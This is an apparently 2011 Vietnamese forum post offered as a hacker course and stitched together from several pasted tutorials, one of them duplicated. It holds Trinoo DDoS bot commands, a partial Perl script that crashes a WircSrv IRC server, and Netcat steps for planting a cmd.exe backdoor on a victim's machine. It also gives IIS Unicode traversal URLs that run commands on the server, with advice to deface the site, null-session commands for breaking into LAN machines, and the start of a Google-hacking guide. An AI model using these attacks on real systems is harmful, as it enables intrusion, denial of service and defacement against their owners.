Giáo trình hacker ae ai quan tâm vào xem - Connect All - Software & Download - 4rum teen

Trở lại   Connect All - Software & Download - 4rum teen > Công Nghệ Thông Tin > Thủ Thuật

 
 
Công cụ bài viết Kiểu hiển thị
Prev Bài viết trước   Bài viết tiếp theo Next
Cũ 03-08-2011, 04:29 PM   #1
Zµ™
I'm Sorry, But I Love You medal114 - Upanh.com
 
Avatar của Zµ™
 
Tham gia ngày: Jul 2011
Bài gửi: 134
Thanks: 7
Thanked 973 Times in 78 Posts
Năng lực viết bài: 8
Zµ™ has a little shameless behaviour in the past
Giáo trình hacker ae ai quan tâm vào xem

aaa pass IP------------------------------------------------- ---Tấn công đến địa chỉ IP đã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1-- > 1999 s .
bbb pass N-------------------------------------------------- ---Đặt thờI gian giới hạn cho các cuộc tấn công DOS .
Shi pass----------------------------------------------- ---------Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng 31335/UDP.
png pass----------------------------------------------- --------Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP.
die pass----------------------------------------------- ---------Shutdown Trinoo.
rsz N-------------------------------------------------- ----------Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte .
xyz pass 123:ip1:ip3---------------------------------------- tấn công DOS nhiều mục tiêu cùng lúc .

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :


WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667.
Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:


Nếu bạn dùng Unix:

[[email protected]$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is `^]`.
[buffer]

Windows cũng tương tự:

telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .
Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):

Code:
#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl use Getopt:td; use Socket; getopts(`s:`, \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p a ddr,$proto); $foo = ``A``; # Đây là NOP $number = ``65000``; # Đây là tất cả số NOP $data .= $foo x $number; # kết quả của $foo times $number $serv = $args{s}; # lệnh điều khiển server từ xa $port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667 $buf = ``$data``; $in_addr = (gethostbyname($serv))[4]

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7

42 . ) Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :


WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667.
Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:


Nếu bạn dùng Unix:

[[email protected]$ telnet irc.example.com 6667
Trying example.com...
Connected to example.com.
Escape character is `^]`.
[buffer]

Windows cũng tương tự:

telnet irc.example.com 6667

Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .
Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):

Code:
#!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl use Getopt:td; use Socket; getopts(`s:`, \%args); if(!defined($args{s})){&usage;} my($serv,$port,$foo,$number,$data,$buf,$in_addr,$p a ddr,$proto); $foo = ``A``; # Đây là NOP $number = ``65000``; # Đây là tất cả số NOP $data .= $foo x $number; # kết quả của $foo times $number $serv = $args{s}; # lệnh điều khiển server từ xa $port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667 $buf = ``$data``; $in_addr = (gethostbyname($serv))[4]

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 8

47.) Các công cụ cần thiết để hack Web :

Đối với các hacker chuyên nghiệp thì họ sẽ không cần sử dụng những công cụ này mà họ sẽ trực tiếp setup phiên bản mà trang Web nạn nhân sử dụng trên máy của mình để test lỗi . Nhưng đối với các bạn mới “vào nghề” thì những công cụ này rất cần thiết , hãy sử dụng chúng một vài lần bạn sẽ biết cách phối hợp chúng để việc tìm ra lỗi trên các trang Web nạn nhân được nhanh chóng nhất . Sau đây là một số công cụ bạn cần phải có trên máy “làm ăn” của mình :

Công cụ thứ 1 : Một cái proxy dùng để che dấu IP và vượt tường lửa khi cần ( Cách tạo 1 cái Proxy tôi đã bày ở phần 7 , các bạn hãy xem lại nhé ) .
Công cụ thứ 2 : Bạn cần có 1 shell account, cái này thực sự quan trọng đối với bạn . Một shell account tốt là 1 shell account cho phép bạn chạy các chương trình chính như nslookup, host, dig, ping, traceroute, telnet, ssh, ftp,...và shell account đó cần phải cài chương trình GCC ( rất quan trọng trong việc dịch (compile) các exploit được viết bằng C) như MinGW, Cygwin và các dev tools khác.
Shell account gần giống với DOS shell,nhưng nó có nhiều câu lệnh và chức năng hơn DOS . Thông thường khi bạn cài Unix thì bạn sẽ có 1 shell account, nếu bạn không cài Unix thì bạn nên đăng ký trên mạng 1 shell account free hoặc nếu có ai đó cài Unix và thiết lập cho bạn 1 shell account thì bạn có thể log vào telnet (Start -- > Run -- > gõ Telnet) để dùng shell account đó. Sau đây là 1 số địa chỉ bạn có thể đăng ký free shell account :
http://www.freedomshell.com/
http://www.cyberspace.org/shell.ht ml
http://www.ultrashell.net/

Công cụ thứ 3 : NMAP là Công cụ quét cực nhanh và mạnh. Có thể quét trên mạng diện rộng và đặc biệt tốt đối với mạng đơn lẻ. NMAP giúp bạn xem những dịch vụ nào đang chạy trên server (services / ports : webserver , ftpserver , pop3,...),server đang dùng hệ điều hành gì,loại tường lửa mà server sử dụng,...và rất nhiều tính năng khác.Nói chung NMAP hỗ trợ hầu hết các kỹ thuật quét như : ICMP (ping aweep),IP protocol , Null scan , TCP SYN (half open),... NMAP được đánh giá là công cụ hàng đầu của các Hacker cũng như các nhà quản trị mạng trên thế giới.
Mọi thông tin về NMAP bạn tham khảo tại http://www.insecure.org/ .
Công cụ thứ 4 : Stealth HTTP Security Scanner là công cụ quét lỗi bảo mật tuyệt vời trên Win32. Nó có thể quét được hơn 13000 lỗi bảo mật và nhận diện được 5000 exploits khác.
Công cụ thứ 5 : IntelliTamper là công cụ hiển thị cấu trúc của một Website gồm những thư mục và file nào, nó có thể liệt kê được cả thư mục và file có set password. Rất tiện cho việc Hack Website vì trước khi bạn Hack một Website thì bạn phải nắm một số thông tin của Admin và Website đó.
Công cụ thứ 6 : Netcat là công cụ đọc và ghi dữ liệu qua mạng thông qua giao thức TCP hoặc UDP. Bạn có thể dùng Netcat 1 cách trực tiếp hoặc sử dụng chương trình script khác để điều khiển Netcat. Netcat được coi như 1 exploitation tool do nó có thể tạo được liên kết giữa bạn và server cho việc đọc và ghi dữ liệu ( tất nhiên là khi Netcat đã được cài trên 1 server bị lỗI ). Mọi thông tin về Netcat bạn có thể tham khảo tại http://www.l0pht.com/ .
Công cụ thứ 7 : Active Perl là công cụ đọc các file Perl đuôi *.pl vì các exploit thường được viết bằng Perl . Nó còn được sử dụng để thi hành các lệnh thông qua các file *.pl .
Công cụ thứ 8 : Linux là hệ điều hành hầu hết các hacker đều sử dụng.
Công cụ thứ 9 : L0pht##### là công cụ số một để ##### Password của Windows NT/2000 .
Cách Download tôi đã bày rồi nên không nói ở đây , các bạn khi Download nhớ chú ý đến các phiên bản của chúng , phiên bản nào có số lớn nhất thì các bạn hãy Down về mà sài vì nó sẽ có thêm một số tính năng mà các phiên bản trước chưa có . Nếu down về mà các bạn không biết sử dụng thì tìm lại các bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì cứ post bài hỏi , các bạn bên đó sẽ trả lời cho bạn .

48.) Hướng dẫn sử dụng Netcat :

a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết một chút về Netcat .
b . ) Biên dịch :
_ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.
- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu ``/``: // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):

#define GAPING_SECURITY_HOLE
#define TELNET

- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ``:.``
PATH=/sbin:/usr/sbin:...:.
_ Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.
c . ) Các tùy chọn của Netcat :
_ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

CODE
C > nc -h
connect to somewhere: nc [-options] hostname port [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d ----------- tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog --- thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h ----------- gọi hướng dẫn
-i secs ----- trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l ------------- đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L ------------ buộc Netcat ``cố`` lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n ------------ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o ------------ file ghi nhật kí vào file
-p port ----- chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr ----- giả mạo địa chỉ IP nguồn là addr
-t ------------- không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u ------------- dùng UDP(mặc định netcat dùng TCP)
-v ------------- hiển thị chi tiết các thông tin về kết nối hiện tại.
-vv ----------- sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs ---- đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z ------------- chế độ zero I/O, thường được sử dụng khi scan port


Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080

d . ) Tìm hiểu Netcat qua các VD :

_ Chộp banner của web server :

Ví dụ: nc đến 172.16.84.2, cổng 80

CODE
C > nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 2037 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html


Để biết thông tin chi tiết về kết nối, bạn có thể dùng –v ( -vv sẽ
cho biết các thông tin chi tiết hơn nữa)

C > nc -vv 172.16.84.1 80

CODE
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 1443 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 2002 GMT
ETag: ``0-cec-3899eaea``
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html
sent 17, rcvd 245: NOTSOCK


Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80

xem file nhat_ki.log xem thử nó đã ghi những gì nhé :

CODE
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F
< 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 1454
< 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap
< 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win
< 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last-Modifi
< 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb
< 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 2002 GM
< 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0-cec-
< 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep
< 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes.
< 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length:
< 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio
< 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten
< 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text/htm
< 000000f0 6c 0d 0a 0d 0a # l....


dấu < nghĩa là server gởi đến netcat
dấu > nghĩa là netcat gởi đến server

_ Quét cổng :
Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1- > 500) của host 172.16.106.1

CODE
[[email protected] /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open


nếu bạn cần scan các cổng UDP, dùng -u

CODE
[[email protected] /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open

_ Biến Netcat thành một trojan :
Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn –l ( listen ) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

CODE
E > nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error


Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

CODE
C > nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
E > cd test
cd test
Etest > dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F
Directory of Etest
[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free
Ctest > exit
exit
sent 20, rcvd 450: NOTSOCK


Như các bạn đã thấy , ta có thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số lệnh cơ bản , ta đã chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé :

CODE
E > nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...?
?


Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s<địa_chỉ_ip_của_máy_này > . Ví dụ:

CODE
netstat -a
...
TCP nan_nhan:domain nan_nhan LISTENING <- cổng 53 đang lắng nghe
...
E > nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 - > lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163?
?


Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.
Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.

( Dựa theo bài viết của huynh Vicky )

49.) Kỹ thuật hack IIS server 5.0 :

_ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé .
_ Trước hết các bạn hãy download activeperl và Unicode.pl .
_ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không :

CODE
telnet < tên trang Web > 80
GET HEAD / HTTP/1.0


Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v…
_ Sau khi đã xác định được mục tiêu các bạn vào DOS gõ :

CODE
perl unicode.pl
Host: ( gõ địa chỉ server mà các bạn muốn hack )
Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đã telnet trước đó ) .


_ Các bạn sẽ thấy bảng liệt kê lỗi ( đã được lập trình trong Unicode.pl ) như sau :

CODE
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+



6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+
[13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+
[14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \%80\%af../winnt/system32/cmd.exe?/c+
[15]/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/c+
[17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+
[18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/c+
[20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c 0%af../winnt/system32/cmd.exe?/c+


Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà thôi .
Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE và nhập đoạn mã tương ứng trên Address :

http://www.xxx.com/scripts/..%c1%p c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3
hoặc
http://www.xxx.com/scripts/..%c1%1 c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7

Đến đây các bạn đã có thể xâm nhập vào server của nạn nhân rồi đó , các bạn hãy sử dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng quậy họ nhé .

GOOKLUCK!!!!!!!!!!!!!!!

Cảm ơn bạn FighterVn đã chia sẻ. Về topic "những hiểu biết cơ bản để trờ thành Hacker "các bạn có thể tham khảo thêm ở quantrimang.com.
Cuối tuần mình cũng xin đóng ghóp một vài mẹo nhỏ.
--------------------------------------------------------------------
Nhưng nếu các bạn biết rồi ,tôi khuyên các bạn chớ "nghịch nhiều".Vài người bạn của đã và đang khốn khổ vì hack đấy! Chẳng biết kiếm được bao tiền [IMG]file:///C:/DOCUME%7E1/ITPRO/LOCALS%7E1/Temp/msohtml1/01/clip_image001.gif[/IMG]

CÁCH ĐỘT NHẬP MẠNG LAN

Giới thiệu sơ lược cho các bạn một vài cách thức cơ bản để kiểm tra và tìm cách đột nhập vào 1 máy tính trong LAN.
1- Kiểm tra IPC share: IPC viết tắt của Inter-Process Communication, được dùng trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng (NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo 1 chia sẻ ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và kết nối đến các chia sẻ trên máy này. Tuy nhiên, có thể vì một lý do gì đó, người dùng xóa mất IPC$ share, do đó, ta cần kiểm tra và tạo lại kết nối đến IPC$ (gọi là null connection), nếu kết nối thành công, ta có thể thấy được cả các chia xẻ đặc biệt được ẩn (bao gồm C$, ADMIN$, IPC$, IPC$). Cụ thể, dùng 1 trong 3 lệnh sau ở command prompt:
C>NET USE \\TARGET\IPC$ "" /USER:""
C>NET USE \\TARGET\IPC$ * /USER:
C>NET USE \\TARGET\IPC$ * /USER:""
trong đó: target là computername hoặc IP của máy bạn muốn kết nối.
Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia xẻ đó được ẩn và cách này chỉ áp dụng khi cổng NetBios 139 của máy bạn và máy đích được mở.
Thường là đối với chia xẻ dạng này, bạn sẽ ít có cơ hội khai thác được gì. Tuy nhiên, nếu may mắn, bạn vẫn có thể khai thác được trong trường hợp các chia xẻ đó không yêu cầu mật khẩu.
Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy được:
C>net view \\TARGET
Lệnh net view sẽ liệt kê danh sách các share của máy đích. Bạn dùng net view /? để biết thêm các cách dùng khác.
Sau khi tạo được null connection và biết được các share trên máy đối phương. Ðối với các share được bảo vệ bằng username/password, bạn có thể dùng các tool sau để thử ##### chúng: Nat (NetBIOS Auditing Tool)...
Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương trình xSharez scanner, cũng có thể cho bạn kết quả tương tự.
2- Kiểm tra các cổng mở
Một cách khác để connect vào một máy là duyệt các port mở của máy đích. Tuỳ loại port mà ta có cách thức khai thác khác nhau, đơn giản nhất là dùng telnet để connect vào máy thông qua port được mở, ví dụ: Ctelnet anhnguyen 69
Một số port thông dụng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
.....
Các công cụ để scan port có rất nhiều, ví dụ như: superscan, elite, ....
Sau khi scan được port nào đang opened, nếu port đó ngoài những port trên, bạn thử dùng telnet để connect, nếu thành công, bạn có thể vào command prompt shell của máy đó.
3- Kiểm tra các lổ hổng của OS/Software
Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là duyệt xem máy đó đang dùng OS gì, server gì, software nào. Mỗi loại trên có các hole/vulnerability riêng, được tìm thấy và mô tả chi tiết trong các site về security như ntbugtraq, securityfocus, hoặc trong forum.
Từ những lổ hổng biết được, ta sử dụng các exploit tương ứng để thâm nhập vào máy.
Lỗi sơ đẳng nhất trong các system software là lỗi về cách đặt password, ví dụ như các máy Wins 9x có thể vào mà không cần password (tất nhiên là khi đó, người log vào sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như với NT/2K, sau khi setup, password ngầm định của adminnistrator là rỗng, nếu user không thay đổi pass cho admin, thì ta có thể connect remote được dưới username là administrator mà không cần pass.
Các lỗi còn lại thường là do các sai sót trong quá trình viết chương trình mà vô tình tạo nên những lỗ hổng, các đoạn code kiểm tra không đầy đủ, không stable...cho phép người dùng thực thi các lệnh, chạy các chương trình từ xa. Ví dụ như bug Unicode encoding của IIS4... Và cách thường dùng để nhập là tìm cách send 1 trojant/backdoor (điển hình như Netcat...) đến máy đó, chạy backdoor đó để mở 1 port nhất định nào đó, rồi ta sẽ connect remote vào port đó.(cảm ơn hk đã cung cấp cho tôi tài liệu này)


Google hack toàn tập (sưu tầm)
Demystifying Google Hacks

By Debasis Mohanty

by

Debasis Mohanty (Orissa, India)

www.hackingspirits.com

Dịch bởi [email protected]



Giới thiệu

Tôi đã nghĩ về việc công bố bài báo này từ lâu nhưng vì thiếu thời gian nên tôi đã không thể hoàn thành nó. Tôi đã bổ sung và cập nhật bài báo này khi tôi đã mệt mỏi với công việc nghiên cứu hàng ngày.

Google là máy tìm kiếm mạnh mẽ và phổ biến nhất thế giới,nó có khả năng chấp nhận những lệnh được định nghĩa sẵn khi nhập vào và cho những kết quả không thể tin được.Điều này cho phép những người dùng có dã tâm như

tin tặc, #####ers, và script kiddies v.v... sử dụng máy tìm kiếm Google để thu thập những thông tin bí mật và nhạy cảm, những cái mà không thể nhìn thấy qua những tìm kiếm thông thường.

Trong bài báo này tôi sẽ làm rõ những điểm dưới đây mà những người quản trị hoặc chuyên gia bảo mật phải đưa vào tài khoản

để phòng chống những thông tin bí mật bị phơi bày.

- Những cú pháp tìm kiếm nâng cao với Google

- Tìm kiếm những Site hoặc Server(máy chủ) dễ bị tấn công sử dụng những cú pháp nâng cao của Google

- Bảo mật cho servers hoặc sites khỏi sự tấn công của Google



Những cú pháp tìm kiếm nâng cao với Google

Dưới đây thảo luận về những lệnh đặc biệt của Google và tôi sẽ giải thích từng lệnh một cách ngắn gọn và nói rõ nó được sử dụng như thế nào để tìm kiếm thông tin.

[ intitle: ]

Cú pháp “intitle:” giúp Google giới hạn kết quả tìm kiếm về những trang có chứa từ đó trong tiêu đề. Ví dụ, “intitle: login password” (không có ngoặc kép) sẽ cho kết quả là những link đến những trang có từ "login" trong tiêu đề, và từ "password" nằm ở đâu đó trong trang.

Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong tiêu đề của trang thì ta có thể dùng “allintitle:” thay cho “intitle” để có kết quả là những trang có chứa tất cả những từ đó trong tiêu đề. Ví dụ như dùng

“intitle: login intitle: password” cũng giống như truy vấn “allintitle: login password”.



[ inurl: ]

Cú pháp “inurl:” giới hạn kết quả tìm kiếm về những địa chỉ URL có chứa từ khóa tìm kiếm. Ví dụ: “inurl: passwd” (không có ngoặc kép) sẽ cho kết quả là những link đến những trang có từ "passwd" trong URL.

Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong URL thì ta có thể dùng “allinurl:” thay cho “inurl” để được kết quả là những URL chứa tất cả những từ khóa tìm kiếm.Ví dụ: “allinurl: etc/passwd“ sẽ tìm kiếm những URL có chứa “etc” và “passwd”. Ký hiệu gạch chéo (“/”) giữa các từ sẽ bị Google bỏ qua.



[ site: ]

Cú pháp “site:” giới hạn Google chỉ truy vấn những từ khóa xác định trong một site hoặc tên miền riêng biệt. Ví dụ: “exploits site:hackingspirits.com” (không có ngoặc kép) sẽ tìm kiếm từ khóa “exploits” trong những trang hiện có trong tất cả các link của tên miền “hackingspirits.com”. Không có khoảng trống nào giữa “site:” và “tên miền”.



[ filetype: ]

Cú pháp “filetype:” giới hạn Google chỉ tìm kiếm những files trên internet có phần mở rộng riêng biệt (Ví dụ: doc, pdf hay ppt v.v...). Ví dụ : “filetype:doc site:gov confidential” (không có ngoặc kép) sẽ tìm kiếm những file có phẩn mở rộng là “.doc” trong tất cả những tên miền của chính phủ có phần mở rộng là “.gov” và chứa từ “confidential”(bí mật) trong trang hoặc trong file “.doc”. Ví dụ . Kết quả sẽ bao gồm những liên kết đến tất cả các file văn bản bí trên các site của chính phủ.



[ link: ]

Cú pháp “link:” sẽ liệt kê những trang web mà có các liên kết đến đến những trang web chỉ định. Ví dụ :

